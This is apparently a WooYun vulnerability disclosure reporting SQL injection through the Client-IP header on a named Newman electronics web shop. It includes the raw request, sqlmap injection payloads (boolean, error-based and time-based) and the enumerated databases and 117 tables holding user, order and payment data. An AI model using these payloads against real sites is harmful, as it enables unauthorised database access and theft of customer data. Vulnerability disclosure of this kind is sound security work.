当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0112802
漏洞标题:
纽曼某站HTTP头存在SQL注入泄露大量信息
相关厂商:
纽曼电子
漏洞作者:
深度安全实验室
提交时间:
2015-05-08 11:10
修复时间:
2015-05-13 11:12
公开时间:
2015-05-13 11:12
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
15
漏洞状态:
漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-05-08: 细节已通知厂商并且等待厂商处理中
2015-05-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

http://newadmin.newman.mobi


GET /goods.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Client-IP: *
Cookie: PHPSESSID=pth8dqd7i7tfchv4fk4qashtn0; ECS[history]=35%2C75%2C116; ECS[display]=grid
Host: newadmin.newman.mobi
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

Client-IP参数有问题~

11.png


库:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) HEADER
Parameter: Client-IP #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: '||(SELECT 'xhFK' FROM DUAL WHERE 3543=3543 AND 6833=6833)||'
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: '||(SELECT 'FSJj' FROM DUAL WHERE 8829=8829 AND (SELECT 1013 FROM(SELECT COUNT(*),CONCAT(0x716e676271,(SELECT (CASE WHEN (1013=1013) THEN 1 ELSE 0 END)),0x717a737971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||'
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: '||(SELECT 'CjFf' FROM DUAL WHERE 6813=6813 AND SLEEP(5))||'
---
back-end DBMS: MySQL 5.0
available databases [6]:
[*] information_schema
[*] mysql
[*] newsmy-bbs
[*] newsmy-uc
[*] newsmy-www
[*] performance_schema

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) HEADER
Parameter: Client-IP #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: '||(SELECT 'xhFK' FROM DUAL WHERE 3543=3543 AND 6833=6833)||'
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: '||(SELECT 'FSJj' FROM DUAL WHERE 8829=8829 AND (SELECT 1013 FROM(SELECT COUNT(*),CONCAT(0x716e676271,(SELECT (CASE WHEN (1013=1013) THEN 1 ELSE 0 END)),0x717a737971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||'
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: '||(SELECT 'CjFf' FROM DUAL WHERE 6813=6813 AND SLEEP(5))||'
---
back-end DBMS: MySQL 5.0
Database: newsmy-www
[117 tables]
+---------------------------+
| apptemp                   |
| ecs_account_log           |
| ecs_ad                    |
| ecs_ad_custom             |
| ecs_ad_position           |
| ecs_admin_action          |
| ecs_admin_log             |
| ecs_admin_message         |
| ecs_admin_user            |
| ecs_adsense               |
| ecs_affiliate_log         |
| ecs_agency                |
| ecs_area_region           |
| ecs_article               |
| ecs_article_cat           |
| ecs_attribute             |
| ecs_auction_log           |
| ecs_auto_manage           |
| ecs_back_goods            |
| ecs_back_order            |
| ecs_bonus_type            |
| ecs_booking_goods         |
| ecs_brand                 |
| ecs_card                  |
| ecs_cart                  |
| ecs_cat_recommend         |
| ecs_category              |
| ecs_collect_goods         |
| ecs_comment               |
| ecs_crons                 |
| ecs_delivery_goods        |
| ecs_delivery_order        |
| ecs_email_list            |
| ecs_email_sendlist        |
| ecs_error_log             |
| ecs_exchange_goods        |
| ecs_favourable_activity   |
| ecs_feedback              |
| ecs_fm                    |
| ecs_friend_link           |
| ecs_goods                 |
| ecs_goods_activity        |
| ecs_goods_article         |
| ecs_goods_attr            |
| ecs_goods_cat             |
| ecs_goods_copy            |
| ecs_goods_gallery         |
| ecs_goods_type            |
| ecs_group_goods           |
| ecs_keywords              |
| ecs_link_goods            |
| ecs_mail_templates        |
| ecs_member_price          |
| ecs_miaosha               |
| ecs_miaosha_0401          |
| ecs_miaosha_copy          |
| ecs_nav                   |
| ecs_order_action          |
| ecs_order_action_04012020 |
| ecs_order_goods           |
| ecs_order_goods_04012020  |
| ecs_order_goods_copy      |
| ecs_order_info            |
| ecs_order_info_04012020   |
| ecs_order_info_14         |
| ecs_order_info_copy0819   |
| ecs_order_info_copy1      |
| ecs_order_info_copy2      |
| ecs_order_info_copy3      |
| ecs_pack                  |
| ecs_package_goods         |
| ecs_pay_log               |
| ecs_pay_log_04012020      |
| ecs_payment               |
| ecs_plugins               |
| ecs_products              |
| ecs_reg_extend_info       |
| ecs_reg_fields            |
| ecs_region                |
| ecs_role                  |
| ecs_searchengine          |
| ecs_sessions              |
| ecs_sessions_data         |
| ecs_shipping              |
| ecs_shipping_area         |
| ecs_shop_config           |
| ecs_snatch_log            |
| ecs_stats                 |
| ecs_suppliers             |
| ecs_tag                   |
| ecs_template              |
| ecs_topic                 |
| ecs_user_account          |
| ecs_user_address          |
| ecs_user_bonus            |
| ecs_user_feed             |
| ecs_user_rank             |
| ecs_users                 |
| ecs_users_copy            |
| ecs_virtual_card          |
| ecs_volume_price          |
| ecs_vote                  |
| ecs_vote_log              |
| ecs_vote_option           |
| ecs_weibo                 |
| ecs_wholesale             |
| ecs_yuding                |
| ecs_yuding_140121         |
| ecs_yuding_copy           |
| ecs_yuding_dj             |
| ecs_yuding_pay            |
| order_info                |
| session_mem               |
| session_wcore             |
| temp_user                 |
| yd1111                    |
| yuding                    |
+---------------------------+

漏洞证明:

用户信息:

12.png

取某些关键字段看看:

3.jpg

订单信息:

13.png

取某些关键字段看看:

5.png

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云

>

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-13 11:12

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无